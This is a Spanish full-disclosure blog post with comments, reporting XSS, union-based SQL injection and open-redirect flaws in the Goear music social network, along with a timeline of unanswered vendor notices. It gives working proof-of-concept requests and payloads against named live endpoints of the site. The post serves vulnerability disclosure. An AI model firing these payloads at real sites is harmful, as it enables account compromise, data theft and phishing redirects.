# Exploit Title :Goear music (social network) SQLinjection Union-Based/ Open Redirect/Cross Site Scripting
Os expongo como ha sido el time-line de la vulnerabilidad:
10-01-2013 Se avisa al “vendor” y a la SGAE
15-01-2013 Vendor no responde
1-02-2013 Se vuelve a avisar al vendor y a la SGAE
10-2-2013 vENDOR Y SGAE no responden
27-02-2013 Primer Disclosure
1-05-2013 Se fixea parcialmente
9-05-2013 Se comunica que NO está fixeado lo indicado
15-05-2013 No hay respuesta de la SGAE ni el vendor
28-05-2013 FULL DISCLOSURE
# Exploit Title :Goear music (social network) SQLinjection Union-Based/ Open Redirect/Cross Site Scripting
# *Vendor*: http://www.goear.com/
# Author: Juan Carlos García
# Blog: http://hackingmadrid.blogspot.com
http://blog.0verl0ad.es
http://highsec.es/blog/
# Facebook http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196
BREVE DESCRIPCION
Goearmusic es una red social de origen español, para escuchar musica online o intercambiarla entre otras cosas. Posee la posibilidad de buscar por artista, por genero, puedes registrarte y puedes poner tu propia lista de musica. Como Youtube enlaza el archivo para que puedas compartirlo.
Importante: Tiene el soporte de la SGAE (Sociedad General de Autores y Editores) algo que lo hace si cabe más interesante …
Cross Site Scripting (Reflected-Persistent)
PoC:
-http://www.goear.com/showtree/tree.php?artist=%3Cscript%3Ealert%28%22Juan%20Carlos%20Garc%C3%ADa%20XSS%22%29%3C%2Fscript%3E
Attack: <script>alert(“Juan Carlos XSS”)</script>
-POST http://www.goear.com/lyric_search.php HTTP/1.1 (Reflected)
Attack: “><script>alert(1);</script>
Parameter:enter_mn_search
enter_mn_search=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&btn_lyric_search=Buscar
BLind SQLinjection (Union-Based)
PoC:
POST http://www.goear.com/account_recovery_step.php
Exploit: email=JUAN%27+UNION+ALL+select+NULL+–+&btn_restore=Reset
Open Redirect
PoC:
POST http://www.goear.com/loged.php HTTP/1.1
back=http%3A%2F%2Fhackingmadrid.blogspot.com&user_name=JUANCARLOS&password=JUANCARLOS&remember=remember&btn_login=Acceder
back=http%3A%2F%2Fwww.owasp.org&user_name=ZAP&password=ZAP&remember=remember&btn_login=Acceder
SPECIAL THANKS: Eduardo (@_Hykeos) y Roberto (@leurian) !!!
Espero que os haya gustado.
juancarlosec@highsec.es
Fantastico el artículo, muy bueno Juan Carlos 🙂
Gracias BTshell .. tu no te quedas corto en tus Post !! Son geniales nene !!
Muy buen post. Planteas un dilema que creo que en la seguridad informática siempre habrá.
¿Reportar o no reportar?
Super! tu post. aunque ya esta vulnerabilidad la habia encontrado ya hace un tiempo. la base de datos es de 1 millon de usuarios , 🙂 todo el aplicativo web esta inseguro.
La encontraste? y que hiciste con ella? la reportaste? Tienes el Time-Line del Disclosure? o te la guardaste para ti? 😉
MUCHAS GRACIAS por cierto por leerme Dylan !!!.
Excelente, este dia llegue a tus post y wow creo que te seguire por siempre. Gracias por tu conocimiento, yo encontre una vulnerabilidad de una pagina pero nose si avisar o no. No lo hice con malas intenciones pero pueda que ellos no lo vean asi. Gracias